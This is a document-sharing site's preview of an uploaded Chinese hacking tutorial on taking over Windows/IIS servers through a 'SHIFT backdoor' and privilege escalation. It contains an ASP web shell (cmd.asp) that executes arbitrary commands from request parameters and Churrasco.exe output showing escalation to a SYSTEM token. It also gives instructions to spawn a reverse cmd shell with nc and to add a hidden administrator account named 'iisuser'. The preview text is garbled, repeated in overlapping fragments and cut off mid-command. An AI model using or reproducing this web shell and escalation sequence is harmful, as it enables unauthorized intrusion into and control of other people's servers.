欢迎来到天天文库
浏览记录
ID:51699626
大小:34.56 KB
页数:4页
时间:2020-03-15
《利用SHIFT后门拿服务器的方法.docx》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、利用SHIft后门拿只有想不到的服务没有做不到的器方法 那么在这里我写点自己提权时所用到几个小方法!也是自己实战得来的经验! 方法如有不对的请大家多多指点! 提权时要到的工具如下:cmd.exeChurrasco.exenc.exe 以上就是今天主要讲的!东西是死的!人是活的!就看你怎么用了! 用以上工具先要确定SHELL里wscript.shell命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法! 代码如下:2、D5-D70A-438B-8A42-98424B88AFB8"><%iferrthen%><%endif%>3、type=submitvalue="netuser"><%OnErrorResumeNextifrequest("cmdx")="C:RECYCLERcmd.exe"thenresponse.writeoScriptlhn.exec("cmd.exe/c"&request("cmd")).stdout.readallendifresponse.writeoScriptlhn.exec(request("cmdx")&"/c"&request("cmd")).stdout.readall%>4、area> 将以上代码保存为cmd.asp上传到SHELL里再访问这个CMD.asp如没有出错等就说明可以执行CMD命令! 下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功但出现/churrasco/-->CurrentUser:NETWORKSERVICE/churrasco/-->GettingRpcssPID.../churrasco/-->FoundRpcssPID:696/ch5、urrasco/-->SearchingforRpcssthreads.../churrasco/-->FoundThread:444/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:700/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:704/churrasco/-->Threadnotimpersonating,lookin6、gforanotherthread.../churrasco/-->FoundThread:712/churrasco/-->Threadimpersonating,gotNETWORKSERVICEToken:0xf24/churrasco/-->GettingSYSTEMtokenfromRpcssService.../churrasco/-->FoundszywjsToken/churrasco/-->FoundSYSTEMtoken0xf1c/churrasco/-->RunningcommandwithSYSTEMToken... 直到这里没有出现命令执行成功那么这时你7、千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了! 在反弹回来的CMDSHELL里执行C:RECYCLERChurrasco.exe"netuseriisuseriisuser/add” C:RECYCLERChurrasco.exe"netlocalgroupadministratorsiisuser/add" C:RECYCL
2、D5-D70A-438B-8A42-98424B88AFB8"><%iferrthen%><%endif%>3、type=submitvalue="netuser"><%OnErrorResumeNextifrequest("cmdx")="C:RECYCLERcmd.exe"thenresponse.writeoScriptlhn.exec("cmd.exe/c"&request("cmd")).stdout.readallendifresponse.writeoScriptlhn.exec(request("cmdx")&"/c"&request("cmd")).stdout.readall%>4、area> 将以上代码保存为cmd.asp上传到SHELL里再访问这个CMD.asp如没有出错等就说明可以执行CMD命令! 下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功但出现/churrasco/-->CurrentUser:NETWORKSERVICE/churrasco/-->GettingRpcssPID.../churrasco/-->FoundRpcssPID:696/ch5、urrasco/-->SearchingforRpcssthreads.../churrasco/-->FoundThread:444/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:700/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:704/churrasco/-->Threadnotimpersonating,lookin6、gforanotherthread.../churrasco/-->FoundThread:712/churrasco/-->Threadimpersonating,gotNETWORKSERVICEToken:0xf24/churrasco/-->GettingSYSTEMtokenfromRpcssService.../churrasco/-->FoundszywjsToken/churrasco/-->FoundSYSTEMtoken0xf1c/churrasco/-->RunningcommandwithSYSTEMToken... 直到这里没有出现命令执行成功那么这时你7、千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了! 在反弹回来的CMDSHELL里执行C:RECYCLERChurrasco.exe"netuseriisuseriisuser/add” C:RECYCLERChurrasco.exe"netlocalgroupadministratorsiisuser/add" C:RECYCL
3、type=submitvalue="netuser"><%OnErrorResumeNextifrequest("cmdx")="C:RECYCLERcmd.exe"thenresponse.writeoScriptlhn.exec("cmd.exe/c"&request("cmd")).stdout.readallendifresponse.writeoScriptlhn.exec(request("cmdx")&"/c"&request("cmd")).stdout.readall%>4、area> 将以上代码保存为cmd.asp上传到SHELL里再访问这个CMD.asp如没有出错等就说明可以执行CMD命令! 下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功但出现/churrasco/-->CurrentUser:NETWORKSERVICE/churrasco/-->GettingRpcssPID.../churrasco/-->FoundRpcssPID:696/ch5、urrasco/-->SearchingforRpcssthreads.../churrasco/-->FoundThread:444/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:700/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:704/churrasco/-->Threadnotimpersonating,lookin6、gforanotherthread.../churrasco/-->FoundThread:712/churrasco/-->Threadimpersonating,gotNETWORKSERVICEToken:0xf24/churrasco/-->GettingSYSTEMtokenfromRpcssService.../churrasco/-->FoundszywjsToken/churrasco/-->FoundSYSTEMtoken0xf1c/churrasco/-->RunningcommandwithSYSTEMToken... 直到这里没有出现命令执行成功那么这时你7、千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了! 在反弹回来的CMDSHELL里执行C:RECYCLERChurrasco.exe"netuseriisuseriisuser/add” C:RECYCLERChurrasco.exe"netlocalgroupadministratorsiisuser/add" C:RECYCL
4、area> 将以上代码保存为cmd.asp上传到SHELL里再访问这个CMD.asp如没有出错等就说明可以执行CMD命令! 下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功但出现/churrasco/-->CurrentUser:NETWORKSERVICE/churrasco/-->GettingRpcssPID.../churrasco/-->FoundRpcssPID:696/ch
5、urrasco/-->SearchingforRpcssthreads.../churrasco/-->FoundThread:444/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:700/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:704/churrasco/-->Threadnotimpersonating,lookin
6、gforanotherthread.../churrasco/-->FoundThread:712/churrasco/-->Threadimpersonating,gotNETWORKSERVICEToken:0xf24/churrasco/-->GettingSYSTEMtokenfromRpcssService.../churrasco/-->FoundszywjsToken/churrasco/-->FoundSYSTEMtoken0xf1c/churrasco/-->RunningcommandwithSYSTEMToken... 直到这里没有出现命令执行成功那么这时你
7、千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了! 在反弹回来的CMDSHELL里执行C:RECYCLERChurrasco.exe"netuseriisuseriisuser/add” C:RECYCLERChurrasco.exe"netlocalgroupadministratorsiisuser/add" C:RECYCL
此文档下载收益归作者所有